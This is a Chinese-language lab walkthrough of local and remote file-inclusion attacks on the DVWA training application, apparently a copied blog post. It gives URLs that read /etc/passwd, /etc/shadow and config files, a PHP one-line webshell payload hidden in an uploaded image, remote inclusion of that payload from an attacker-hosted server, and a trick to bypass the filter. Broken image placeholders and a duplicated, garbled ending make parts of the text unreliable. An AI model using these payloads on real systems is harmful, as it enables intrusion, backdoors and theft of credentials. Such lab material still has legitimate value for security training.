文件包含
本地文件包含-低级
访问本地系统账号信息及其他敏感信息
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/passwd
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/shadow
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf
http://192.168.1.105/dvwa/robots.txt
需要一定运维能力才能找到敏感文件,这些目录仅限于靶机里位置
本地文件包含+webshell
1.制作一句话木马 e.g.monkey.jpg
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[pengge]);?>')?>
密码就叫pengge
用这个软件打开输入代码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1mHfDIYK-1587987615119)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427181531743.png)]
2、将图片上传到网站,并且查看是否成功上传
提示:
上传路径:http://192.168.1.105/dvwa/vulnerabilities/upload/
包含路径:http://192.168.1.105/dvwa/vulnerabilities/fi
//生成的PHP文件位置,即shell20.php
3、执行文件包含并生成后门
相对路径:http://192.168.1.105/dvwa/vulnerabilities/fi/?page=…/…/hackable/uploads/1.jpg
绝对路径:http://192.168.1.105/dvwa/vulnerabilities/fi/?page=var/www/dvwa/hackable/uploads/1.jpg
成功效果图
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S433gxWG-1587987615123)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427183500615.png)]
再用菜刀连接获取shell
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0nRvnaOk-1587987615126)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427184313182.png)]
尝试添加文件,删除文件,看是否有权限
本地文件包含-中级
同上,查看源代码可以发现没影响,只是会将"http:"或者“https:“换为空格
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cQfWzvwN-1587987615131)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427191341967.png)]
本地文件包含-高级
<?php
$file = $_GET['page']; //The page we wish to display
// Only allow include.php
if ( $file != "include.php" ) {
echo "ERROR: File not found!";
exit;
}
?>
可以看出只能允许include.php。所以不行
远程文件包含+webshell
1、建立远程服务器,本项目使用kali作为远程服务器
#service apache2 start
#vim /var/www/html/pengge.txt
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[pengge]);?>')?>
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ACC6enIh-1587987615136)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427185413635.png)]
然后vim编辑器在/var/www/html下建立pengge.txt
在主机上访问
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vszm50g7-1587987615139)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190141590.png)]
然后执行文件
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fUHSQLEv-1587987615141)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190220973.png)]
看起来没效果,但进入能发现已经生成了shell20.php
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QyjK52Xi-1587987615143)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190338319.png)]
再用菜刀连接
略去过程了,如上面连接所示
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e98zLh9g-1587987615146)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427190808562.png)]
远程文件包含-中级
这个就有影响了
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LUMNBWyb-1587987615149)(C:\Users\19674\AppData\Roaming\Typora\typora-user-images\image-20200427191341967.png)]
所以我们可以将路径改为
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=httphttp://😕/192.168.1.103/pengge.txt
b-1587987615149)]
所以我们可以将路径改为
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=httphttp://😕/192.168.1.103/pengge.txt
后台把http://换为空后就是正常的地址